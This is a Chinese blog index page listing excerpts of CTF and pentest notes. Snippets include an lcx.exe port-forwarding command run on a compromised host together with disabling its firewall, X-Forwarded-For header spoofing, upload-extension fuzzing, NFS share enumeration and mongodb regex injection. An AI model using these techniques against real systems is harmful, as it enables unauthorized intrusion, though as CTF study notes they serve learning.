上一页 1 ··· 3 4 5 6 7
摘要: # -*-coding:UTF-8-*- from sys import stdout miwen = "KCCPKBGUFDPHQTYAVINRRTMVGRKDNBVFDETDGILTXRGUD DKOTFMBPVGEGLTGCKQRACQCWDNAWCRXIZAKFTLEWRPTYCQKYVXCHKFTPONCQQRHJVAJUWETMCMSPKQDYHJVDAHCTRLSVSKCGCZQ... 阅读全文
posted @ 2017-03-01 22:09 tr1ple 阅读(983) 评论(0) 推荐(0) 编辑
摘要: 1. 关于两者详细解释,参考链接:www.crifan.com/python_re_search_vs_re_findall/ 代码图 阅读全文
posted @ 2017-02-27 10:51 tr1ple 阅读(329) 评论(0) 推荐(0) 编辑
摘要: 记录一些环境软件配置方面的一些笔记,方便以后查看。 1.sublime默认不能输入中文,解决方法如下: 2.ubuntu16.04安装后在执行sudo apt-get update && apt-get upgrade后自带的软件中心无法再次打开, 此时再次执行 安装新的软件中心(默认为蓝色) 3. 阅读全文
posted @ 2017-02-22 21:08 tr1ple 阅读(397) 评论(0) 推荐(1) 编辑
摘要: 前几天在图书馆看书,恰好看到这本《深入剖析nginx》,花了快一周的时间看完了这本书,写点笔记心得便于以后复习。 以前对nginx的认识就只是停留在一个反向代理服务器上。百度了一下nginx也很火,仅次于apache和微软的iis。nginx的主要特点就是占用系统资源少,并发能力强,稳定性好。 第1 阅读全文
posted @ 2016-12-26 00:08 tr1ple 阅读(2448) 评论(0) 推荐(0) 编辑
摘要: web: 1.web萌新福利 没啥好说的,右键查看源码得key 2.you are not admin 一看题目,就想到http头修改,常见的x-forwarded-for,referer,host,client-ip,location更改x-forwarded-for为127.0.0.1即可得ke 阅读全文
posted @ 2016-12-20 00:16 tr1ple 阅读(1995) 评论(0) 推荐(0) 编辑
摘要: 1.内网渗透端口转发: 在被控制机上执行: lcx.exe -slave 216.32.*.*(一个外网ip) 51 192.168.2.32(内网ip) 端口号 netsh firewall set opmode disable 开启3389后关闭防火墙 在本机上执行: lcx.exe liste 阅读全文
posted @ 2016-11-30 14:00 tr1ple 阅读(358) 评论(0) 推荐(0) 编辑
摘要: 1.对于给定的二维码图片不能直接扫描出来的可以进行反色在进行扫描,反色可以直接选中图片然后就会进行反色。2.局域网中抓取的数据包的加密方式可能是aes加密。3.凯撒加密可能是变种的凯撒加密,可能奇数偶数位的移位数不同。 4.zip伪加密 直接用16进制编辑器查看,查找50 4B 01 02 然后观察 阅读全文
posted @ 2016-11-26 21:08 tr1ple 阅读(458) 评论(0) 推荐(0) 编辑
摘要: 1.当php后缀被过滤的时候可以直接对ph开头的后缀进行一个fuzz测试可以上传的文件后缀名2.curl -x 123.45.67.89:1080 -o page.html http://www.linuxidc.com指定http访问所使用的proxy服务器及其端口 3.CTF php://inp 阅读全文
posted @ 2016-11-26 21:06 tr1ple 阅读(628) 评论(0) 推荐(1) 编辑
摘要: NFS漏洞:(Network File System 即网络文件系统NFS 默认工作在2049端口) 目录列举: 方法1: nmap -script=nfs-ls.nse 127.0.0.1 方法2. 挂载到本地 mount -t nfs 192.168.0.1:/export/home /tmp/ 阅读全文
posted @ 2016-11-26 20:27 tr1ple 阅读(468) 评论(0) 推荐(0) 编辑
摘要: foremost 恢复单个类型文件 删除一个 USB(/dev/sdba1)存储器中一个 png 文件然后使用 formost 恢复。 恢复完成后会在当前目录建立一个 output 目录,在 output 目录下会建立 png 子目录下会包括所有可以恢复的 png 格式的文件。 需要说明的是 png 阅读全文
posted @ 2016-11-15 23:44 tr1ple 阅读(452) 评论(0) 推荐(0) 编辑
摘要: 1.利用像素点还原图片。 2.py requests方法的利用以及利用正则匹配查找文本暴力破解md5值。 3.利用py将base64编码的字符串还原成图片 4.生成0e哈希值: 5.mongodb基于正则注入: 6.多次压缩打包 7.多次解压: 阅读全文
posted @ 2016-11-15 21:29 tr1ple 阅读(3709) 评论(0) 推荐(0) 编辑
上一页 1 ··· 3 4 5 6 7